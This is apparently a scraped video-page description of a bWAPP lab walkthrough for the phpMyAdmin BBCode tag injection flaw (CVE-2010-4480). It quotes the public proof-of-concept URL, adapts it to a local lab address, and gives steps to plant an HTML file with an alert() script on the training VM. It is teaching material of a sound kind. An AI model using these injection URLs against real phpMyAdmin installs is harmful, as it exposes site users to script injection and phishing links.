phpMyAdmin BBCode Tag XSS

Name: phpMyAdmin BBCode Tag XSS
Uploaded: Feb 17, 2022
Duration: 516 s

PseudoTime1.31K subscribers

1.2K views

Feb 17, 2022

8:36

phpMyAdmin BBCode Tag XSS - Low Security Level Solution: Step 1. Click on CVE-2010-4480 in case if there is error in loading the page visit url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4480 Step 2. Search for EXPLOIT-DB:15699 - Click on URL:http://www.exploit-db.com/exploits/15699 Step 3. Check the POC url, lets try accesssing the phpmyadmin page. Follow steps as shown in the video. POC: http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa] Open new browser tab and give the below link a. http://myip/phpmyadmin http://10.0.2.4/phpmyadmin/ b. http://yourip/phpmyadmin/error.php?type=yourtext http://10.0.2.4/phpmyadmin/error.php?type=PseudoTime c. Using the same logic the below url has been created. http://10.0.2.4/phpmyadmin/error.php?type=PseudoTime&error=No+error+[a@http://10.0.2.4/bWAPP/timephp.html@a]click+here[/a] Note: To execute the Step 3 point no. c successfully you will have to complete the below pre-requisite. Not covered in this video, but steps given below. Pre-Requisite: **You will have to create a file in the beebox to execute the step 3 point no. c. The file has to be created in the /var/www/bWAPP folder with .html extension. Details not covered in this video. However if you want to create the file than follow below steps: i. Go to the beebox terminal and give below commands a. To login as root use command - su root b. Check if you are root with command - whoami c. To Navigate to the correct path follow commands - cd / ls cd /var/www/bWAPP d. create a file inside /bWAPP folder and add the below contents Note: As Angled brackets aren't allowed in YouTube Description, replacing them with ( ), kindly make the necessary change. command -) cat ) filename.html (html) (head) (title)Time(/title) (script)alert("Hello PseudoTime")(/script) (/head) (body) (h1)Greetings from PseudoTime(/h1) (h2) Hello World (/h2) (/body) (/html) e. Save the file with - ctrl+D f. Come back to your Kali machine give the ip address of your beebox and navigate to the path to check if the file is successfully loaded g. Modify the below url as per your requirement. http://10.0.2.4/phpmyadmin/error.php?type=PseudoTime&error=No+error+[a@http://10.0.2.4/bWAPP/timephp.html@a]click+here[/a] PseudoTime

Download

0 formats

No download links available.